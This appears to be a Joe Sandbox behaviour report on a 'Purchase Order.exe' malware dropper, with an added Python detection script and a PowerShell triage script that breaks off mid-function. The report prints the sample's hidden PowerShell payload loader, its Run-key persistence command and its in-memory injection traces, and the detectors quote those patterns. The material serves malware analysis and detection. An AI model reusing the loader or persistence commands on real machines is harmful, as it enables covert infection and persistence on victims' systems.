Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
Source: classification engine | Classification label: mal100.troj.evad.winEXE@13/12@4/3
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Code function: 7_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\Purchase Order.exe | File created: C:\Users\user\AppData\Local\potentially
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Mutant created: \Sessions\1\BaseNamedObjects\-2MBZMJ
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsrA3F.tmpJump to behavior
            Source: Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Purchase Order.exeVirustotal: Detection: 20%
            Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Users\user\Desktop\Purchase Order.exeJump to behavior
            Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
            Source: C:\Users\user\Desktop\Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
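The process tree above is the whole infection chain in five command lines, and it is what a detection engineer would key on rather than any single file hash. The following Python is an added example, not part of the Joe Sandbox report or of any tool it mentions: it rebuilds the chain from constructed process-creation events whose command lines are copied from the entries above, and flags each stage. It catches the hidden powershell.exe that reads Epilogic.bac and invokes a three-character substring of it as a command (the report does not show which command name that substring resolves to), the cmd.exe child that only evaluates `set /A 1^^0`, the executable started from %LOCALAPPDATA%\Temp by powershell.exe, and the REG ADD that writes a REG_EXPAND_SZ Run value whose program is %Compressible% and whose script body is read back from HKCU:\Xylograferede94. The PIDs, parent links, the Sysmon-like event layout and the rule names are assumptions made for the example.

```python
"""Process-chain detection over the events listed in the report above.

Added example, not part of the Joe Sandbox report. The events are constructed
from the report's "Process created" command lines; PIDs, parent links and the
Sysmon-like event shape are assumptions made for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
DROPPED = r"C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"
REG_CMD = (r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" '''
           r'''/t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized '''
           r'''$Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"''')

# Constructed input (PIDs assumed); the command lines are the ones the report shows.
EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 1, r"C:\Users\user\Desktop\Purchase Order.exe",
              r'"C:\Users\user\Desktop\Purchase Order.exe"'),
    ProcEvent(2000, 1000, PS,
              r'''"powershell.exe" -windowstyle hidden "$Encloser=Get-Content '''
              r"""'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';"""
              r'''$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"'''),
    ProcEvent(3000, 2000, CMD, r'"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"'),
    ProcEvent(4000, 2000, DROPPED, r'"C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"'),
    ProcEvent(5000, 4000, CMD, r'"C:\Windows\System32\cmd.exe" /c ' + REG_CMD),
    ProcEvent(6000, 5000, r"C:\Windows\SysWOW64\reg.exe", REG_CMD),
]

# Command-line rules, one per stage of the chain the report records.
RULES: Dict[str, re.Pattern] = {
    # Stage 1: read a non-script file, carve a 3-character command name out of
    # it at a fixed offset and call it with the whole file content as argument.
    "ps_content_substring_invoke": re.compile(
        r"Get-Content\s+'[^']+'\s*;.*\.SubString\(\d+\s*,\s*3\)\s*;\s*\.\$\w+\(", re.I),
    # powershell.exe spawning cmd.exe only to evaluate a trivial expression.
    "cmd_trivial_set_a": re.compile(r"/c\s+set\s+/A\s+\d+\s*\^+\s*\d+", re.I),
    # Persistence: REG_EXPAND_SZ Run value whose program is an environment
    # variable and whose script body is fetched from another HKCU key.
    "runkey_expand_env_registry_payload": re.compile(
        r"REG\s+ADD\s+HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b.*"
        r"/t\s+REG_EXPAND_SZ\s+/d\s+\"%\w+%.*Get-ItemProperty\s+-Path\s+'HKCU:\\", re.I),
}
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Image basenames from the root ancestor down to `pid`."""
    by_pid = {e.pid: e for e in events}
    chain: List[str] = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def scan(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[str, int]] = []
    for e in events:
        findings += [(name, e.pid) for name, rx in RULES.items() if rx.search(e.cmdline)]
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        # Structural rule: an .exe under %LOCALAPPDATA%\Temp started by powershell.exe.
        if (basename(parent.image).lower() == "powershell.exe"
                and "\\appdata\\local\\temp\\" in e.image.lower()
                and e.image.lower().endswith(".exe")):
            findings.append(("powershell_runs_dropped_temp_exe", e.pid))
        # Structural rule: hidden-window powershell.exe whose parent is not a shell.
        if (basename(e.image).lower() == "powershell.exe"
                and re.search(r"-windowstyle\s+hidden", e.cmdline, re.I)
                and basename(parent.image).lower() not in SHELL_PARENTS):
            findings.append(("hidden_powershell_from_unusual_parent", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in scan(EVENTS):
        print(f"{rule:38s} pid={pid}  {' > '.join(ancestry(EVENTS, pid))}")
```

The two structural rules need the parent link, which a flat command-line match cannot supply: a lone REG ADD to the Run key can be an administrator, but a REG ADD whose program is an environment variable, issued by a cmd.exe under an executable in %LOCALAPPDATA%\Temp that powershell.exe started, is exactly the chain this report records, and `ancestry()` prints that chain next to each hit.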
            Source: C:\Users\user\Desktop\Purchase Order.exe | Section loaded (in order): uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, windows.storage.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, ntmarta.dll, apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Section loaded (in order): windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, wininet.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, winmm.dll, rstrtmgr.dll
            Source: C:\Users\user\Desktop\Purchase Order.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Purchase Order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb@ | source: powershell.exe, 00000002.00000002.2751700296.0000000008327000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5SEA | source: powershell.exe, 00000002.00000002.2746093793.0000000002B78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb | source: powershell.exe, 00000002.00000002.2749734497.000000000721D000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000002.00000002.2752200135.000000000B5E5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Glaciated $Uddeligheds $Overfldigstes), (Nonvirulent @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Zogo = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Hallooed)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Samdeling, $false).DefineType($Blaffe, $Omniparo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
            Source: C:\Users\user\Desktop\Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
            Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Announces
            Source: C:\Users\user\Desktop\Purchase Order.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6229Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3598Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe TID: 5380Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_00406033 FindFirstFileA,FindClose,7_2_00406033
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,7_2_004055D1
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_00402688 FindFirstFileA,7_2_00402688
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: Purchase Order.exe, 00000000.00000002.1988217073.0000000000648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:++
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-3274
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-3426
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02C4D6E0 LdrInitializeThunk,2_2_02C4D6E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe base: 16E0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe base: 19FFF4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "announces" /t reg_expand_sz /d "%compressible% -windowstyle minimized $harmlses=(get-itemproperty -path 'hkcu:\xylograferede94\').karatenes;%compressible% ($harmlses)" (the same command in the report's case-folded form; listed twice)
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managero
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managert
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA
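The Run-key persistence recorded above has a shape that is easy to hunt for on a live host: the value is REG_EXPAND_SZ, it starts with an environment variable (%Compressible%) where an executable path would normally be, and it carries PowerShell syntax that reads the real payload out of a second registry key (HKCU:\Xylograferede94, property Karatenes) rather than from a file. The following PowerShell is an added triage example written for this page; it is not part of the Joe Sandbox report or of the sample. The value name, key and property above are taken from the report and are only used as illustration; the check itself is generic. It assumes that a per-user variable such as %Compressible% would be defined under HKCU:\Environment (the report section shown here does not say where the sample defines it) and reports whatever definition it finds there.

```powershell
# Added triage example (not from the Joe Sandbox report or the sample): hunt the
# current user's Run key for values that launch an interpreter through an
# environment variable and pull their script out of another registry key.

$RunKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'

# Tokens that do not belong in a normal "app.exe [args]" Run value.
$PowerShellTokens = @('Get-ItemProperty', '-windowstyle', 'HKCU:', 'Invoke-Expression', 'IEX', 'FromBase64String')

function Get-SuspiciousRunEntry {
    param([string]$Path = $RunKey)

    if (-not (Test-Path -Path $Path)) { return }
    $key = Get-Item -Path $Path

    foreach ($name in $key.GetValueNames()) {
        # DoNotExpandEnvironmentNames keeps "%Compressible%" literal instead of
        # resolving it, so the text inspected is what the dropper wrote.
        $raw  = [string]$key.GetValue($name, '', [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
        $kind = $key.GetValueKind($name)

        $tokens     = @($PowerShellTokens | Where-Object { $raw -match [regex]::Escape($_) })
        $envLaunch  = $raw -match '^\s*"?%[^%]+%'          # interpreter hidden behind %VAR%
        $expandable = $kind -eq [Microsoft.Win32.RegistryValueKind]::ExpandString

        if ($tokens.Count -eq 0 -and -not ($expandable -and $envLaunch)) { continue }

        # Where the command fetches its staged script from, when it follows the
        # (Get-ItemProperty -Path '<key>').<property> pattern seen in the report.
        $payloadKey = $null; $payloadProperty = $null
        if ($raw -match "Get-ItemProperty\s+-Path\s+'([^']+)'\s*\)\.(\w+)") {
            $payloadKey      = $Matches[1]
            $payloadProperty = $Matches[2]
        }

        # Assumption: a per-user variable the value depends on would be defined
        # under HKCU:\Environment; report its definition (or an empty string).
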